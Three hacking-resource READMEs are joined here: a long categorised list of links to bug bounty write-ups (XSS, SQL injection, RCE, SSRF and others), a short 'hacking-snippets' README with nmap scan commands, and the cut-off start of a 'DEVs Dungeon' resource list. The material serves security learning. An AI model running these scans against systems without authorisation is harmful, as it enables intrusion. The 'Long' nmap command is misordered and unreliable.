again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz - [IE & Edge URL parsin Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify - [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) - [Google Japan Book XSS](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/) - [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans - [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) - [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) - [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy - [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard - [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard - [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) - [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy - [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) - [postMessage XSS Bypass](https://hackerone.com/reports/231053) - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans - [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) - [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen - [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) - [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov - [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [Researching Polymorphic Images for XSS on Google Scholar](https://blog.doyensec.com/2020/04/30/polymorphic-images-for-xss.html) - [OLX Bug Bounty: Reflected XSS in 404 Page](https://medium.com/@abaykandotcom/olx-bug-bounty-reflected-xss-adb3095cd525) ### Brute Force - [Web Authentication Endpoint Credentials Brute-Force Vulnerability](https://hackerone.com/reports/127844) by Arne Swinnen - [InstaBrute: Two Ways to Brute-force Instagram Account Credentials](https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-instagram-account-credentials/) by Arne Swinnen - [How I Could Compromise 4% (Locked) Instagram Accounts](https://www.arneswinnen.net/2016/03/how-i-could-compromise-4-locked-instagram-accounts/) by Arne Swinnen - [Possibility to brute force invite codes in riders.uber.com](https://hackerone.com/reports/125505) by r0t - [Brute-Forcing invite codes in partners.uber.com](https://hackerone.com/reports/144616) by Efkan Gökbaş (mefkan) ### SQL Injection - [SQL injection in Wordpress Plugin Huge IT Video Gallery in Uber](https://hackerone.com/reports/125932) by glc - [SQL Injection on sctrack.email.uber.com.cn](https://hackerone.com/reports/150156) by Orange Tsai - [Yahoo – Root Access SQL Injection – tw.yahoo.com](http://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/) by Brett Buerhaus - [Multiple vulnerabilities in a WordPress plugin at drive.uber.com](https://hackerone.com/reports/135288) by Abood Nour (syndr0me) - [GitHub Enterprise SQL Injection](http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html) by Orange - [Yahoo SQL Injection to Remote Code Exection to Root Privilege](http://www.sec-down.com/wordpress/?p=494) by Ebrahim Hegazy ### Stealing Access Token - [Facebook Access Token Stolen](https://whitton.io/articles/stealing-facebook-access-tokens-with-a-double-submit/) by Jack Whitton - - [Obtaining Login Tokens for an Outlook, Office or Azure Account](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) by Jack Whitton - [Bypassing Digits web authentication's host validation with HPP](https://hackerone.com/reports/114169) by filedescriptor - [Bypass of redirect_uri validation with /../ in GitHub](http://homakov.blogspot.hk/2014/02/how-i-hacked-github-again.html?m=1) by Egor Homakov - [Bypassing callback_url validation on Digits](https://hackerone.com/reports/108113) by filedescriptor - [Stealing livechat token and using it to chat as the user - user information disclosure](https://hackerone.com/reports/151058) by Mahmoud G. (zombiehelp54) - [Change any Uber user's password through /rt/users/passwordless-signup - Account Takeover (critical)](https://hackerone.com/reports/143717) by mongo (mongo) - [Internet Explorer has a URL problem, on GitHub](http://blog.innerht.ml/internet-explorer-has-a-url-problem/) by filedescriptor. - [How I made LastPass give me all your passwords](https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/) by labsdetectify - [Steal Google Oauth in Microsoft](http://blog.intothesymmetry.com/2015/06/on-oauth-token-hijacks-for-fun-and.html) - [Steal FB Access Token](http://blog.intothesymmetry.com/2014/04/oauth-2-how-i-have-hacked-facebook.html) - [Paypal Access Token Leaked](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html?m=1) - [Steal FB Access Token](http://homakov.blogspot.sg/2013/02/hacking-facebook-with-oauth2-and-chrome.html) - [Appengine Cool Bug](https://proximasec.blogspot.hk/2017/02/a-tale-about-appengines-authentication.html) - [Slack post message real life experience](https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/) - [Bypass redirect_uri](http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html) by nbsriharsha - [Stealing Facebook Messenger nonce worth 15k](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/) - [Steal Oculus Nonce and Oauth Flow Bypass](https://medium.com/@lokeshdlk77/bypass-oauth-nonce-and-steal-oculus-response-code-faa9cc8d0d37) #### Google oauth bypass - [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton ### CSRF - [Messenger.com CSRF that show you the steps when you check for CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) by Jack Whitton - [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack)](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) by Florian Courtial - [Hacking PayPal Accounts with one click (Patched)](http://yasserali.com/hacking-paypal-accounts-with-one-click/) by Yasser Ali - [Add tweet to collection CSRF](https://hackerone.com/reports/100820) by vijay kumar - [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd - [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani - [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) ### Remote Code Execution - [JDWP Remote Code Execution in PayPal](https://www.vulnerability-lab.com/get_content.php?id=1474) by Milan A Solanki - [XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers](http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution) by Reginaldo Silva - [How I Hacked Facebook, and Found Someone's Backdoor Script](http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/) by Orange Tsai - [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) by Orange Tsai - [uber.com may RCE by Flask Jinja2 Template Injection](https://hackerone.com/reports/125980) by Orange Tsai - [Yahoo Bug Bounty - *.login.yahoo.com Remote Code Execution](http://blog.orange.tw/2013/11/yahoo-bug-bounty-part-2-loginyahoocom.html) by Orange Tsai (Sorry its in Chinese Only) - [How we broke PHP, hacked Pornhub and earned $20,000](https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/) by Ruslan Habalov - *Alert*, God-like Write-up, make sure you know what is ROP before clicking, which I don't =( - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek - [WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic](https://hackerone.com/reports/134738) by Cure53 (cure53) - [Read-Only user can execute arbitraty shell commands on AirOS](https://hackerone.com/reports/128750) by 93c08539 (93c08539) - [Remote Code Execution by impage upload!](https://hackerone.com/reports/158148) by Raz0r (ru_raz0r) - [Popping a shell on the Oculus developer portal](https://bitquark.co.uk/blog/2014/08/31/popping_a_shell_on_the_oculus_developer_portal) by Bitquark - [Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit - 10,000$](https://5haked.blogspot.sg/) by 5haked - [PayPal Node.js code injection (RCE)](http://artsploit.blogspot.hk/2016/08/pprce2.html) by Michael Stepankin - [eBay PHP Parameter Injection lead to RCE](http://secalert.net/#ebay-rce-ccs) - [Yahoo Acqusition RCE](https://seanmelia.files.wordpress.com/2016/02/yahoo-remote-code-execution-cms1.pdf) - [Command Injection Vulnerability in Hostinger](http://elladodelnovato.blogspot.hk/2017/02/command-injection-vulnerability-in.html?spref=tw&m=1) by @alberto__segura - [RCE in Airbnb by Ruby Injection](http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/) by buerRCE - [RCE in Imgur by Command Line](https://hackerone.com/reports/212696) - [RCE in git.imgur.com by abusing out dated software](https://hackerone.com/reports/206227) by Orange Tsai - [RCE in Disclosure](https://hackerone.com/reports/213558) - [Remote Code Execution by struct2 Yahoo Server](https://medium.com/@th3g3nt3l/how-i-got-5500-from-yahoo-for-rce-92fffb7145e6) - [Command Injection in Yahoo Acquisition](http://samcurry.net/how-i-couldve-taken-over-the-production-server-of-a-yahoo-acquisition-through-command-injection/) - [$50k RCE in JetBrains IDE](http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/) - [Telekom.de Remote Command Execution!](http://www.sec-down.com/wordpress/?p=581) by Ebrahim Hegazy - [Magento Remote Code Execution Vulnerability!](http://www.sec-down.com/wordpress/?p=578) by Ebrahim Hegazy - [Yahoo! Remote Command Execution Vulnerability](http://www.sec-down.com/wordpress/?p=87) by Ebrahim Hegazy #### Deserialization - [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin - [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg - [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) - [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals #### Image Tragick - [Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)](http://nahamsec.com/exploiting-imagemagick-on-yahoo/) by NaHamSec - [Exploting ImageMagick to get RCE on HackerOne](https://hackerone.com/reports/135072) by c666a323be94d57 - [Trello bug bounty: Access server's files using ImageTragick](https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetragick/) by Florian Courtial - [40k fb rce](4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html) - [Yahoo Bleed 1](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-continues-18-byte-file-14k-bounty.html) - [Yahoo Bleed 2](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-more-powerful-dumping-yahoo.html) ### Direct Object Reference (IDOR) - [Trello bug bounty: The websocket receives data when a public company creates a team visible board](https://hethical.io/trello-bug-bounty-the-websocket-receives-data-when-a-public-company-creates-a-team-visible-board/) by Florian Courtial - [Trello bug bounty: Payments informations are sent to the webhook when a team changes its visibility](https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-the-webhook-when-a-team-changes-its-visibility/) by Florian Courtial - [Change any user's password in Uber](https://hackerone.com/reports/143717) by mongo - [Vulnerability in Youtube allowed moving comments from any video to another](https://www.secgeek.net/youtube-vulnerability/) by secgeek - It's *Google* Vulnerability, so it's worth reading, as generally it is more difficult to find Google vulnerability - [Twitter Vulnerability Could Credit Cards from Any Twitter Account](https://www.secgeek.net/twitter-vulnerability/) by secgeek - [One Vulnerability allowed deleting comments of any user in all Yahoo sites](https://www.secgeek.net/yahoo-comments-vulnerability/) by secgeek - [Microsoft-careers.com Remote Password Reset](http://yasserali.com/microsoft-careers-com-remote-password-reset/) by Yaaser Ali - [How I could change your eBay password](http://yasserali.com/how-i-could-change-your-ebay-password/) by Yaaser Ali - [Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication](https://duo.com/blog/duo-security-researchers-uncover-bypass-of-paypal-s-two-factor-authentication) by Duo Labs - [How I got access to millions of [redacted] accounts](https://bitquark.co.uk/blog/2016/02/09/how_i_got_access_to_millions_of_redacted_accounts) - [All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description](https://hackerone.com/reports/137502) by Enguerran Gillier (opnsec) - [Urgent: attacker can access every data source on Bime](https://hackerone.com/reports/149907) by Jobert Abma (jobert) - [Downloading password protected / restricted videos on Vimeo](https://hackerone.com/reports/145467) by Gazza (gazza) - [Get organization info base on uuid in Uber](https://hackerone.com/reports/151465) by Severus (severus) - [How I Exposed your Primary Facebook Email Address (Bug worth $4500)](http://roy-castillo.blogspot.hk/2013/07/how-i-exposed-your-primary-facebook.html) by Roy Castillo - [DOB disclosed using “Facebook Graph API Reverse Engineering”](https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71#.9gbtbv42q) by Raja Sekar Durairaj - [Change the description of a video without publish_actions permission in Facebook](http://philippeharewood.com/change-the-description-of-a-video-without-publish_actions-permission/) by phwd - [Response To Request Injection (RTRI)](https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZmUT09/) by ?, be honest, thanks to this article, I have found quite a few bugs because of using his method, respect to the author! - [Leak of all project names and all user names , even across applications on Harvest](https://hackerone.com/reports/152696) by Edgar Boda-Majer (eboda) - [Changing paymentProfileUuid when booking a trip allows free rides at Uber](https://hackerone.com/reports/162809) by Matthew Temmy (temmyscript) - [View private tweet](https://hackerone.com/reports/174721) - ~~[Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User](http://stephensclafani.com/2014/07/08/hacking-facebooks-legacy-api-part-1-making-calls-on-behalf-of-any-user/) by Stephen Sclafani~~ - ~~[Hacking Facebook’s Legacy API, Part 2: Stealing User Sessions](http://stephensclafani.com/2014/07/29/hacking-facebooks-legacy-api-part-2-stealing-user-sessions/) by Stephen Sclafani~~ - [Delete FB Video](https://danmelamed.blogspot.hk/2017/01/facebook-vulnerability-delete-any-video.html) - [Delete FB Video](https://pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-from-facebook/) - [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) - [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec - [Mass Assignment, Response to Request Injection, Admin Escalation](https://seanmelia.wordpress.com/2017/06/01/privilege-escalation-in-a-django-application/) by sean - [Getting any Facebook user's friend list and partial payment card details](https://www.josipfranjkovic.com/blog/facebook-friendlist-paymentcard-leak) - [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) ### XXE - [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify - [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht - [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) - [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) ### Unrestricted File Upload - [File Upload XSS in image uploading of App in mopub](https://hackerone.com/reports/97672) by vijay kumar - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek - [File Upload XSS in image uploading of App in mopub in Twitter](https://hackerone.com/reports/97672) by vijay kumar (vijay_kumar1110) ### Server Side Request Forgery (SSRF) - [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus - [SSRF to pivot internal network](https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf) - [SSRF to LFI](https://seanmelia.wordpress.com/2015/12/23/various-server-side-request-forgery-issues/) - [SSRF to query google internal server](https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/) - [SSRF by using third party Open redirect](https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/) by Brett BUERHAUS - [SSRF tips from BugBountyHQ of Images](https://twitter.com/BugBountyHQ/status/868242771617792000) - [SSRF to RCE](http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) - [XXE at Twitter](https://hackerone.com/reports/248668) - [Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface ](http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html) - [Plotly AWS Metadata SSRF (and a stored XSS)](https://ysx.me.uk/a-pair-of-plotly-bugs-stored-xss-and-aws-metadata-ssrf/) ### Race Condition - [Race conditions on Facebook, DigitalOcean and others (fixed)](http://josipfranjkovic.blogspot.hk/2015/04/race-conditions-on-facebook.html) by Josip Franjković - [Race Conditions in Popular reports feature in HackerOne](https://hackerone.com/reports/146845) by Fábio Pires (shmoo) - [Hacking Starbuck for unlimited money](https://sakurity.com/blog/2015/05/21/starbucks.html) by Egor Homakov ### Business Logic Flaw - [How I Could Steal Money from Instagram, Google and Microsoft](https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/) by Arne Swinnen - [Facebook - bypass ads account's roles vulnerability 2015](http://blog.darabi.me/2015/03/facebook-bypass-ads-account-roles.html) by POUYA DARABI - [Uber Eat for Free](https://t.co/MCOM7j2dWX) by ### Authentication Bypass - [OneLogin authentication bypass on WordPress sites via XMLRPC in Uber](https://hackerone.com/reports/138869) by Jouko Pynnönen (jouko) - [2FA PayPal Bypass](https://henryhoggard.co.uk/blog/Paypal-2FA-Bypass) by henryhoggard - [SAML Bug in Github worth 15000](http://www.economyofmechanism.com/github-saml.html) - [Authentication bypass on Airbnb via OAuth tokens theft](https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/) - [Administrative Panel Access](http://c0rni3sm.blogspot.hk/2017/08/accidentally-typo-to-bypass.html?m=1) by c0rni3sm - [Flickr Oauth Misconfiguration](https://mishresec.wordpress.com/2017/10/12/yahoo-bug-bounty-exploiting-oauth-misconfiguration-to-takeover-flickr-accounts/) by mishre - [Slack SAML authentication bypass](http://blog.intothesymmetry.com/2017/10/slack-saml-authentication-bypass.html) by Antonio Sanso - [Shopify admin authentication bypass using partners.shopify.com](https://hackerone.com/reports/270981) by uzsunny ### HTTP Header Injection - [Twitter Overflow Trilogy in Twitter](https://blog.innerht.ml/overflow-trilogy/) by filedescriptor - [Twitter CRLF](https://blog.innerht.ml/twitter-crlf-injection/) by filedescriptor - [Adblock Plus and (a little) more in Google](https://adblockplus.org/blog/finding-security-issues-in-a-website-or-how-to-get-paid-by-google) - [$10k host header](https://sites.google.com/site/testsitehacking/10k-host-header) by Ezequiel Pereira ### Subdomain Takeover - [Hijacking tons of Instapage expired users Domains & Subdomains](http://www.geekboy.ninja/blog/hijacking-tons-of-instapage-expired-users-domains-subdomains/) by geekboy - [Reading Emails in Uber Subdomains](https://hackerone.com/reports/156536) - [Slack Bug Journey](http://secalert.net/slack-security-bug-bounty.html) - by David Vieira-Kurz - [Subdomain takeover and chain it to perform authentication bypass](https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/) by Arne Swinnen - [Hacker.One Subdomain Takeover](https://hackerone.com/reports/159156) - by geekboy ## XSSI - [Plain Text Reading by XSSI](http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/) - [JSON hijacking](http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html) - [OWASP XSSI](https://www.owasp.org/images/f/f3/Your_Script_in_My_Page_What_Could_Possibly_Go_Wrong_-_Sebastian_Lekies%2BBen_Stock.pdf) - [Japan Identifier based XSSI attacks](http://www.mbsd.jp/Whitepaper/xssi.pdf) - [JSON Hijack Slide](https://www.owasp.org/images/6/6a/OWASPLondon20161124_JSON_Hijacking_Gareth_Heyes.pdf) ## Email Related - [This domain is my domain - G Suite A record vulnerability](http://blog.pentestnepal.tech/post/156959105292/this-domain-is-my-domain-g-suite-a-record) - [I got emails - G Suite Vulnerability](http://blog.pentestnepal.tech/post/156707088037/i-got-emails-g-suite-vulnerability) - [How I snooped into your private Slack messages [Slack Bug bounty worth $2,500]](http://blog.pentestnepal.tech/post/150381068912/how-i-snooped-into-your-private-slack-messages) - [Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000]](http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty) - [Slack Yammer Takeover by using TicketTrick](https://medium.com/@intideceukelaire/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c) by Inti De Ceukelaire - [How I could have mass uploaded from every Flickr account!](https://ret2got.wordpress.com/2017/10/05/how-i-could-have-mass-uploaded-from-every-flickr-account/) ## Money Stealing - [Round error issue -> produce money for free in Bitcoin Site](https://hackerone.com/reports/176461) by 4lemon ## 2017 Local File Inclusion - [Disclosure Local File Inclusion by Symlink](https://hackerone.com/reports/213558) - [Facebook Symlink Local File Inclusion](http://josipfranjkovic.blogspot.hk/2014/12/reading-local-files-from-facebooks.html) - [Gitlab Symlink Local File Inclusion](https://hackerone.com/reports/158330) - [Gitlab Symlink Local File Inclusion Part II](https://hackerone.com/reports/178152) - [Multiple Company LFI](http://panchocosil.blogspot.sg/2017/05/one-cloud-based-local-file-inclusion.html) - [LFI by video conversion, excited about this trick!](https://hackerone.com/reports/226756) ## Miscellaneous - [SAML Pen Test Good Paper](http://research.aurainfosec.io/bypassing-saml20-SSO/) - [A list of FB writeup collected by phwd](https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640) by phwd - [NoSQL Injection](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecurify - [CORS in action](http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) - [CORS in Fb messenger](http://www.cynet.com/blog-facebook-originull/) - [Web App Methodologies](https://blog.zsec.uk/ltr101-method-to-madness/) - [XXE Cheatsheet](https://www.silentrobots.com/blog/2015/12/14/xe-cheatsheet-update/) - [The road to hell is paved with SAML Assertions, Microsoft Vulnerability](http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass) - [Study this if you like to learn Mongo SQL Injection](https://cirw.in/blog/hash-injection) by cirw - [Mongo DB Injection again](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecrify - [w3af speech about modern vulnerability](https://www.youtube.com/watch?v=GNU0_Uzyvl0) by w3af - [Web cache attack that lead to account takeover](http://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html) - [A talk to teach you how to use SAML Raider](https://www.usenix.org/conference/usenixsecurity12/technical-sessions/presentation/somorovsky) - [XSS Checklist when you have no idea how to exploit the bug](http://d3adend.org/xss/ghettoBypass) - [CTF write up, Great for Bug Bounty](https://ctftime.org/writeups?tags=web200&hidden-tags=web%2cweb100%2cweb200) - [It turns out every site uses jquery mobile with Open Redirect is vulnerable to XSS](http://sirdarckcat.blogspot.com/2017/02/unpatched-0day-jquery-mobile-xss.html) by sirdarckcat - [Bypass CSP by using google-analytics](https://hackerone.com/reports/199779) - [Payment Issue with Paypal](https://hackerone.com/reports/219215) - [Browser Exploitation in Chinese](http://paper.seebug.org/) - [XSS bypass filter](https://t.co/0Kpzo52ycb) - [Markup Impropose Sanitization](https://github.com/ChALkeR/notes/blob/master/Improper-markup-sanitization.md) - [Breaking XSS mitigations via Script Gadget](https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf) - [X41 Browser Security White Paper](https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf) - [Bug Bounty Cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) By EdOverflow - [Messing with the Google Buganizer System for $15,600 in Bounties](https://medium.freecodecamp.org/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5) - [Electron Security White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf) - [Twitter's Vine Source code dump - $10080](https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/) - [SAML Bible](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/) - [Bypassing Google’s authentication to access their Internal Admin panels — Vishnu Prasad P G](https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3) - [Smart Contract Vulnerabilities](http://www.dasp.co/)
# hacking-snippets Useful snippets and links for hacking competitions. Work in progress # Table of Contents 1. [Recconnaissance](#Recconnaissance) 2. [Enumeration](#Enumeration) 3. [Exploitation](#Exploitation) 4. [PrivEsc](#PrivEsc) ## Recconnaissance ### Useful links - [peoplefinder](https://peoplefinder.com) - Information about Persons - [who.is](https://who.is) - Domain lookup - [sublist3r](https://github.com/aboul3la/Sublist3r) - Subdomain enumeration - [hunter.io](https://hunter.io/) - Find emails associated with domain - [builtwith.com](https://builtwith.com/) - See what tech the site is built with - [wappalyzer](https://www.wappalyzer.com/) - Similar to builtwith - [viewdns.info](https://viewdns.info) - Lookup a lot of information regarding domains and ip. ## Enumeration ### NMAP It is often useful to do two nmap scans - one for low hanging fruit (quick), and one that can run in the background and scan all ports. Quick: `nmap -sC -sV -oA quick.nmap <target ip>` Long: `nmap -sC -sV -oA -p- full.nmap <target ip>` ### Dir scans **Dir scan** **VHOST scan** ### Nikto ## Exploitation ## PrivEsc ### Useful links - [gtfobins](https://gtfobins.github.io/)
[![Discord](https://img.shields.io/discord/865937470118297640.svg?logo=discord&colorB=5865F2)](https://discord.gg/ceMXzhfaka) To join **DEVs Dungeon** GitHub Organization, click [here](https://github.com/Devs-Dungeon/support/issues/new?assignees=&labels=invite+me+to+the+organisation&template=invitation.yml&title=Please+invite+me+to+the+GitHub+Community+Organization) ➤ If you find this **REPOSITORY** helpful, then do give it a `🌟` by pressing the topmost-right button 🤗 ➤ To save a copy of this **REPOSITORY** to your own GitHub, click on <a href="https://github.com/Devs-Dungeon/Resources/edit/main/README.md"><kbd><b>Fork</b></kbd></a> on the top right of your screen 🤗 ![](https://user-images.githubusercontent.com/73097560/115834477-dbab4500-a447-11eb-908a-139a6edaec5c.gif) # Hacking Resources ![DEVs Dungeon](https://img.shields.io/badge/devs-dungeon-red.svg) ![Awesome community](https://img.shields.io/badge/awesome-community-green.svg) A collection of hacking / penetration testing resources to make you better! ## Table of Contents * [Learning the Skills](#learning-the-skills) * [YouTube Channels](#youtube-channels) * [Companies](#Companies) * [Conferences](#Conferences) * 